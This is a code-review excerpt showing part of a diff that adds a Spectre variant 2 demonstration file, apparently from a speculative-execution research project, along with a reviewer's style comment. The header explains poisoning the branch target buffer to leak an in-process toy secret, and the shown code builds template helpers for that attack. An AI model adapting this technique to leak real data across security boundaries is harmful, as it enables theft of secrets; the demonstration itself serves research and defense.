demos/spectre_v2.cc

```diff
@@ -0,0 +1,298 @@
+ * Compared to competing approaches we don't bother to reverse-engineer branch
+ * predictors. Since we need a universal and robust solution we have to
+ * abstract from their peculiarities, so our solution is based on a brute-force
+ * approach.
+ * We flood the Branch target buffer (BTB) with a plenty of jumps that do not
+ * follow typical patterns. In this way we interleave jumps to real readers
+ * (FirstActualRead and SecondActualRead) that fetch safe values with jumps to
+ * the dummy reader (DummyRead) that does not fetch anything, but gets the
+ * unsafe values. That leads to misspeculations (some of the dummy reader
+ * jumps are misspeculated somewhere into the real fetcher destinations).
+ **/
+
+#include <array>
+#include <cstring>
+#include <iostream>
+
+#include "cache_sidechannel.h"
+#include "instr.h"
+
+const char *public_data = "Hello, world!";
+const char *private_data = "It's a s3kr3t!!!";
+
+// Recursive templates to repeat code without using .rept and inline assembly.
+// Generates NOP instructions (used in DummyRead).
+template<unsigned int N> struct Nops {
+  SAFESIDE_ALWAYS_INLINE static inline void generate() {
+    GenerateNop();
+    Nops<N - 1>::generate();
+  }
+};
+
+template<> struct Nops<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate() {
+    // Empty.
+  }
+};
+
+// Fetches an address N-times in a real reader (FirstActualRead or
+// SecondActualRead).
+template<unsigned int N> struct Fetches {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    (void)*reinterpret_cast<const volatile char *>(addr);
+    Fetches<N - 1>::generate(addr);
+  }
+};
+
+template<> struct Fetches<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(const void *addr) {
+    // Empty.
+  }
+};
+
+// Repeatedly indirectly invokes a real reader on a safe address in
+// LeakByte.
+template<unsigned int N> struct SafeCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    real_reader(safe_address);
+    SafeCalls<N - 1>::generate(real_reader, safe_address);
+  }
+};
+
+template<> struct SafeCalls<0> {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (*real_reader)(const void *),
+#elif SAFESIDE_IA32
+     void (SAFESIDE_FASTCALL *real_reader)(const void *),
+#else
+#  error Unsupported architecture.
+#endif
+     const void *safe_address) {
+    // Empty.
+  }
+};
+
+// Repeatedly flushes a dummy reader from the cache and invokes it on an
+// unsafe address in LeakByte.
+template<unsigned int N> struct DummyCalls {
+  SAFESIDE_ALWAYS_INLINE static inline void generate(
+#if SAFESIDE_X64 || SAFESIDE_ARM64 || SAFESIDE_PPC
+     void (**dummy_reader)(const void *),
```

Comment:
If you make this a `typedef` or type alias defined earlier in the file, I think you can remove a lot of these compiler switches throughout the rest of the file.